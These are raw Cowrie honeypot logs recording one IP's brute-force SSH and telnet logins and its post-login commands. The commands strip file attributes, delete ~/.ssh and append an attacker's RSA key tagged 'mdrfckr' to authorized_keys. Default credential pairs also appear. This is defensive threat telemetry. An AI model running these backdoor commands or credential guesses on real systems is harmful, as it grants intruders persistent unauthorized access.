{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:35:41.941523Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:35:41.942717Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:42.213569Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:35:42.769406Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:35:42.770095Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:35:43.040889Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:43.041786Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38196,"dst_ip":"1.2.3.4","dst_port":22,"session":"44bf189a0255","protocol":"ssh","message":"New connection: 212.227.235.229:38196 (1.2.3.4:22) [session: 44bf189a0255]","sensor":"my-vps","timestamp":"2025-08-26T04:35:43.309779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:35:43.310723Z","src_ip":"212.227.235.229","session":"44bf189a0255"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:49.043691Z","src_ip":"212.227.235.229","session":"44bf189a0255"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38208,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f5de2b33d9b","protocol":"ssh","message":"New connection: 212.227.235.229:38208 (1.2.3.4:22) [session: 8f5de2b33d9b]","sensor":"my-vps","timestamp":"2025-08-26T04:35:49.312622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:35:49.313313Z","src_ip":"212.227.235.229","session":"8f5de2b33d9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:35:49.583036Z","src_ip":"212.227.235.229","session":"8f5de2b33d9b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:35:50.705467Z","src_ip":"212.227.235.229","session":"8f5de2b33d9b"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:50.976808Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:50.978133Z","src_ip":"212.227.235.229","session":"8f5de2b33d9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36550,"dst_ip":"1.2.3.4","dst_port":22,"session":"75ac79275fa9","protocol":"ssh","message":"New connection: 212.227.235.229:36550 (1.2.3.4:22) [session: 75ac79275fa9]","sensor":"my-vps","timestamp":"2025-08-26T04:36:08.526368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:36:08.527705Z","src_ip":"212.227.235.229","session":"75ac79275fa9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:36:08.807739Z","src_ip":"212.227.235.229","session":"75ac79275fa9"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123","message":"login attempt [tom/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:36:09.968503Z","src_ip":"212.227.235.229","session":"75ac79275fa9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:11.251234Z","src_ip":"212.227.235.229","session":"75ac79275fa9"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:24.625224Z","src_ip":"212.227.235.229","session":"b23d9bca2302"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37466,"dst_ip":"1.2.3.4","dst_port":22,"session":"57991f9d94b0","protocol":"ssh","message":"New connection: 212.227.235.229:37466 (1.2.3.4:22) [session: 57991f9d94b0]","sensor":"my-vps","timestamp":"2025-08-26T04:36:25.705010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:36:25.705741Z","src_ip":"212.227.235.229","session":"57991f9d94b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:36:25.781699Z","src_ip":"212.227.235.229","session":"57991f9d94b0"}
{"eventid":"cowrie.login.failed","username":"tom","password":"test","message":"login attempt [tom/test] failed","sensor":"my-vps","timestamp":"2025-08-26T04:36:26.124661Z","src_ip":"212.227.235.229","session":"57991f9d94b0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:27.203858Z","src_ip":"212.227.235.229","session":"57991f9d94b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60872,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcc6deaf60e8","protocol":"telnet","message":"New connection: 212.227.235.229:60872 (1.2.3.4:23) [session: dcc6deaf60e8]","sensor":"my-vps","timestamp":"2025-08-26T04:36:45.989324Z"}
{"eventid":"cowrie.session.closed","duration":1.1632845401763916,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:47.152541Z","src_ip":"212.227.235.229","session":"dcc6deaf60e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60884,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc17e4005a8d","protocol":"telnet","message":"New connection: 212.227.235.229:60884 (1.2.3.4:23) [session: fc17e4005a8d]","sensor":"my-vps","timestamp":"2025-08-26T04:36:47.413913Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:36:48.212116Z","src_ip":"212.227.235.229","session":"fc17e4005a8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:36:48.282591Z","src_ip":"212.227.235.229","session":"fc17e4005a8d"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T04:36:48.578568Z","src_ip":"212.227.235.229","session":"fc17e4005a8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:49.634553Z","src_ip":"212.227.235.229","session":"fc17e4005a8d"}
{"eventid":"cowrie.session.closed","duration":2.226252555847168,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:49.640096Z","src_ip":"212.227.235.229","session":"fc17e4005a8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48256,"dst_ip":"1.2.3.4","dst_port":22,"session":"66dea7c913e8","protocol":"ssh","message":"New connection: 212.227.235.229:48256 (1.2.3.4:22) [session: 66dea7c913e8]","sensor":"my-vps","timestamp":"2025-08-26T04:36:53.028435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:36:53.029645Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:36:53.299173Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.login.success","username":"root","password":"root123@","message":"login attempt [root/root123@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:36:54.420647Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:36:54.979241Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:36:54.979894Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:36:54.980622Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:55.251296Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:36:55.894079Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:36:55.894815Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:36:56.167316Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:36:56.168523Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48270,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc9024cdf58a","protocol":"ssh","message":"New connection: 212.227.235.229:48270 (1.2.3.4:22) [session: dc9024cdf58a]","sensor":"my-vps","timestamp":"2025-08-26T04:36:56.433737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:36:56.434794Z","src_ip":"212.227.235.229","session":"dc9024cdf58a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50534,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5ed6700167b","protocol":"ssh","message":"New connection: 212.227.235.229:50534 (1.2.3.4:22) [session: b5ed6700167b]","sensor":"my-vps","timestamp":"2025-08-26T04:36:58.075485Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:36:58.274004Z","src_ip":"212.227.235.229","session":"dc9024cdf58a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:36:59.385542Z","src_ip":"212.227.235.229","session":"dc9024cdf58a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:36:59.610832Z","src_ip":"212.227.235.229","session":"b5ed6700167b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:36:59.611502Z","src_ip":"212.227.235.229","session":"b5ed6700167b"}
{"eventid":"cowrie.login.failed","username":"xmr","password":"xmr123","message":"login attempt [xmr/xmr123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:37:00.621060Z","src_ip":"212.227.235.229","session":"b5ed6700167b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:00.655550Z","src_ip":"212.227.235.229","session":"dc9024cdf58a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48286,"dst_ip":"1.2.3.4","dst_port":22,"session":"8af45d35a1ce","protocol":"ssh","message":"New connection: 212.227.235.229:48286 (1.2.3.4:22) [session: 8af45d35a1ce]","sensor":"my-vps","timestamp":"2025-08-26T04:37:00.924176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:37:00.924850Z","src_ip":"212.227.235.229","session":"8af45d35a1ce"}
